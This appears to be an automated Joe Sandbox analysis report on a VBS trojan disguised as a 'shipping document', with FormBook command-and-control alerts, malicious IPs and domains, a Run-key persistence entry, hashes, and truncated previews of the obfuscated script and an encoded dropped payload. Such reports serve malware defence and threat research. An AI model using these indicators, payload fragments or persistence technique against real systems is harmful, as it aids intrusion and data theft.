                                                    https://apis.google.compowershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.251.35.161
                                                        		drive.usercontent.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        142.251.41.14
                                                        		drive.google.comUnited States
                                                        		15169GOOGLEUSfalse
                                                        157.7.107.63
                                                        		www.a-two-spa-salon.comJapan7506INTERQGMOInternetIncJPtrue
                                                        80.240.20.220
                                                        		www.jthzbrdb.funGermany
                                                        		20473AS-CHOOPAUStrue

                                                        General Information

                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1430120
                                                        Start date and time:2024-04-23 07:52:16 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 40s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:22
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:shipping document.vbs
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.expl.evad.winVBS@22/10@6/4
                                                        EGA Information:
                                                        • Successful, ratio: 33.3%
                                                        HCA Information:
                                                        • Successful, ratio: 79%
                                                        • Number of executed functions: 27
                                                        • Number of non-executed functions: 229
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .vbs

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 72.21.81.240
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 5852 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 6856 because it is empty
                                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        06:54:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF C:\Program Files (x86)\windows mail\wab.exe
                                                        06:54:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF C:\Program Files (x86)\windows mail\wab.exe
                                                        07:53:23API Interceptor1x Sleep call for process: wscript.exe modified
                                                        07:53:36API Interceptor329x Sleep call for process: powershell.exe modified
                                                        07:55:17API Interceptor10x Sleep call for process: openfiles.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        80.240.20.220NEW ORDER.vbsGet hashmaliciousFormBook, GuLoaderBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.jthzbrdb.funNEW ORDER.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 80.240.20.220

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          INTERQGMOInternetIncJPtajma.x86-20240422-0535.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 118.27.80.227
                                                          QXeoSsX87R.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 157.7.100.23
                                                          mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 157.7.79.166
                                                          arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 157.7.100.11
                                                          240330_unpackedGet hashmaliciousUnknownBrowse
                                                          • 157.7.189.53
                                                          Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 157.7.189.60
                                                          mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                          • 160.251.83.161
                                                          ARKublg5Cr.exeGet hashmaliciousFormBookBrowse
                                                          • 150.95.255.38
                                                          5eLzbTDypM.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 157.7.79.199
                                                          https://3kou.co.jp/-/fef6255b484a1dc0dac35fd87bb905ae/index.htmlGet hashmaliciousUnknownBrowse
                                                          • 118.27.100.147
                                                          AS-CHOOPAUSlS9yzwGRef.elfGet hashmaliciousMiraiBrowse
                                                          • 44.174.121.50
                                                          Q2bIN963Kt.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 44.174.121.31
                                                          Yui1pUgieI.elfGet hashmaliciousMiraiBrowse
                                                          • 44.40.164.138
                                                          NEW ORDER.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 80.240.20.220
                                                          jLntRRok3B.elfGet hashmaliciousMiraiBrowse
                                                          • 44.40.163.66
                                                          u2.batGet hashmaliciousBazar Loader, QbotBrowse
                                                          • 45.77.68.166
                                                          xhTOzKi0iBBi.exeGet hashmaliciousXWormBrowse
                                                          • 45.32.168.59
                                                          SCTR11670000pdf.exeGet hashmaliciousLokibotBrowse
                                                          • 136.244.109.75
                                                          SCTR116509006.exeGet hashmaliciousLokibotBrowse
                                                          • 136.244.109.75

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0ecopy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          72625413524.vbsGet hashmaliciousXWormBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          Shipping Document_PDF.vbsGet hashmaliciousUnknownBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          QUOTE RNP002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          https://secure.rightsignature.com/signers/72685de1-0891-4676-ba51-0639e8aac386/sign?identity_token=e9BkbAE3-a65UvyeRkxLGet hashmaliciousHTMLPhisherBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          37f463bf4616ecd445d4a1937da06e19copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          Swift_Message#1234323456.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          72625413524.vbsGet hashmaliciousXWormBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          Purchase Inquiry.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          232_786.msiGet hashmaliciousUnknownBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          file.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          CE1KVxYp5t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14
                                                          Ve6VeFSgkz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                          • 142.251.35.161
                                                          • 142.251.41.14

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                          Download File
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                          Category:dropped
                                                          Size (bytes):69993
                                                          Entropy (8bit):7.99584879649948
                                                          Encrypted:true
                                                          SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                          MD5:29F65BA8E88C063813CC50A4EA544E93
                                                          SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                          SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                          SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                          Malicious:false
                                                          Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                          Download File
                                                          Process:C:\Windows\System32\wscript.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):330
                                                          Entropy (8bit):3.1414940076987787
                                                          Encrypted:false
                                                          SSDEEP:6:kKUF/lDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:cF/lMkPlE99SNxAhUeVLVt
                                                          MD5:F1C6482040F00B9F8A01BCE942BF6467
                                                          SHA1:FA195AFFEECD8C4C977175986DD52129CF4E0FFD
                                                          SHA-256:492E49C8F9A777B5F852FD0A3D628EAE69B8B2BBB83EB5D01343D2F5EFAE28CE
                                                          SHA-512:AB6765ED3E1283FB2BACD5468BBFDED14D8211F2A47424373DF815FFA728F689F932BAF59228625940536000C2AB8832724FCB25DA1ACF2408C48D4F758F0891
                                                          Malicious:false
                                                          Preview:p...... ........OB..B...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):11608
                                                          Entropy (8bit):4.886255615007755
                                                          Encrypted:false
                                                          SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                          MD5:C7F7A26360E678A83AFAB85054B538EA
                                                          SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                          SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                          SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulJnp/p:NllU
                                                          MD5:BC6DB77EB243BF62DC31267706650173
                                                          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                          Malicious:false
                                                          Preview:@...e.................................X..............@..........

                                                          C:\Users\user\AppData\Local\Temp\03F67l1929

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\openfiles.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1221538113908904
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                          MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                          SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                          SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                          SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ztt1tkp.iey.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nds2wyu3.ehl.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtsip2o5.owx.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylha2nxj.qjz.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Roaming\Finindstillingernes119.Uni

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):433144
                                                          Entropy (8bit):5.969365294127977
                                                          Encrypted:false
                                                          SSDEEP:6144:29fzVUU6e0scuJPzEqSQ7/+djGPX3XCGJYaCrM7NJXX3ea2Ds+4CBjQuG8+AblYn:2lVh5cuJPz5Cx6XCG6axZE/4UqMlYn
                                                          MD5:AF535DCBB662B0A33195E62523475006
                                                          SHA1:5FDE78818872AEDE6C1DB9C660702775B8254961
                                                          SHA-256:E61232040BEB48A5E1E73664CC1E066C5C8A633A67D6B219669121C0FD0DDF55
                                                          SHA-512:2DA2E2240AD6A4AE1EC10714CB38F37ACE6A173E6122B1E7513E9768A496E25EF433305328143DF92DC02B4980977F4396C5E4074050387F607792674A7E3362
                                                          Malicious:false
                                                          Preview:cQGbcQGbu3SyCQDrArat6wI0uANcJARxAZtxAZu5Aqlk4nEBm3EBm4Hxby+GRnEBm+sCm7uB6W2G4qTrAuOCcQGbcQGb6wK8aLrZZKTVcQGb6wJ3dnEBm+sC4n4xynEBm3EBm4kUC3EBm3EBm9Hi6wJMfusCNcKDwQTrAsiq6wJJ84H5THCeAXzLcQGbcQGbi0QkBOsCzCJxAZuJw3EBm+sCEemBw/6GNgFxAZtxAZu6dRRCDXEBm3EBm4Hyyv4goXEBm+sCXqOBwkEVnVPrAkcUcQGb6wIUxOsC/EdxAZvrApjeiwwQcQGbcQGbiQwTcQGbcQGbQusCFQXrAuHUgfpQhAQAddbrAklX6wJAZIlcJAxxAZvrAtsVge0AAwAAcQGbcQGbi1QkCHEBm+sCrOeLfCQE6wIsn+sCTeiJ63EBm3EBm4HDnAAAAHEBm+sC5ilTcQGb6wKGBGpAcQGbcQGbievrAlgs6wK/W8eDAAEAAAAwqwFxAZvrAoHCgcMAAQAA6wK0bHEBm1PrAsPQ6wJqdYnr6wL7qnEBm4m7BAEAAHEBm+sCTnaBwwQBAADrAkO06wJI9VPrAgrv6wL/vGr/cQGb6wKc3oPCBesC7TTrAoiIMfZxAZtxAZsxyesC3F7rAswRixpxAZtxAZtB6wKnAusCqSY5HAp18nEBm+sCe6FG6wL7sHEBm4B8Cvu4ddxxAZtxAZuLRAr8cQGbcQGbKfDrAtsqcQGb/9JxAZvrAsV/ulCEBABxAZvrAnlsMcBxAZvrAnkXi3wkDOsCBf1xAZuBNAeGbdK1cQGbcQGbg8AEcQGbcQGbOdB15usC+AfrAvg0iftxAZtxAZv/1+sCgMtxAZu6mFtQB4GzmTtkU3HnRG+80+Q3DC0WUKsHnO5at/FTRDhWmocHnOMafd3rZUEp37V45Coe4FQQNPJg0i67TDc08mDSPhev/jTqYNJbo3awNX+utDBMqld+h23SjDfVBNMHkn3QB9gZ

                                                          Static File Info

                                                          General

                                                          File type:ASCII text, with CRLF line terminators
                                                          Entropy (8bit):5.106483057853362
                                                          TrID:
                                                            File name:shipping document.vbs
                                                            File size:285'416 bytes
                                                            MD5:1dce662b3782fbec7c5f4f73d8e63f41
                                                            SHA1:25cf442e9e62d5a83dd81c980da84c5ec27dac75
                                                            SHA256:35b1922951d049fedf34ebd18d57fd8acccaf65e462c6dc6308f5d63e17381ee
                                                            SHA512:0b51ae1e312a172e96704371ad4a67a3a30269bba4100e92e6c2265d22696e105b51b955d23ce932f1480aa74acee4a98c512416dfa11aa266e2ca3fc27f63a1
                                                            SSDEEP:6144:LXdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOcM8/DskFsO:7nS2Im3GgFVYp
                                                            TLSH:B6544AA0CFCA26394F5B2FDABD60459289FC8199021224BDE6D907AD7243D6CD3FED14
                                                            File Content Preview:....Fastansattesredisplayed = LTrim("Obducenterne") ....Rem Inscrutability! nightclothes dalstrkning aftrappet, preciseste charlatanish unwilting convicinity malaccident..Rem Negrene hemmelighedskrmmernes patruljevagten. parkinsonia! rugbrdsmotoren bogens

                                                            File Icon

                                                            Icon Hash:68d69b8f86ab9a86

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            04/23/24-07:55:11.026123TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972080192.168.2.9157.7.107.63
                                                            04/23/24-07:55:13.838498TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972180192.168.2.9157.7.107.63
                                                            04/23/24-07:55:19.489536TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972380192.168.2.9157.7.107.63
                                                            04/23/24-07:55:34.111211TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972480192.168.2.9172.217.16.36
                                                            04/23/24-07:54:55.001136TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971980192.168.2.980.240.20.220

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 23, 2024 07:53:40.011924982 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.011980057 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.012109041 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.023483992 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.023499012 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.220756054 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.221046925 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.221752882 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.221832991 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.225883007 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.225895882 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.226161003 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.235723019 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.276124001 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.421535015 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.421699047 CEST44349706142.251.41.14192.168.2.9
                                                            Apr 23, 2024 07:53:40.421720028 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.421777964 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.424029112 CEST49706443192.168.2.9142.251.41.14
                                                            Apr 23, 2024 07:53:40.515532970 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:40.515573025 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:40.515675068 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:40.516030073 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:40.516041994 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:40.707541943 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:40.707643986 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:40.710155010 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:40.710166931 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:40.710419893 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:40.711361885 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:40.752113104 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.506619930 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.506746054 CEST49707443192.168.2.9142.251.35.161
                                                            Apr 23, 2024 07:53:41.512120008 CEST44349707142.251.35.161192.168.2.9
                                                            Apr 23, 2024 07:53:41.512307882 CEST49707443192.168.2.9142.251.35.161
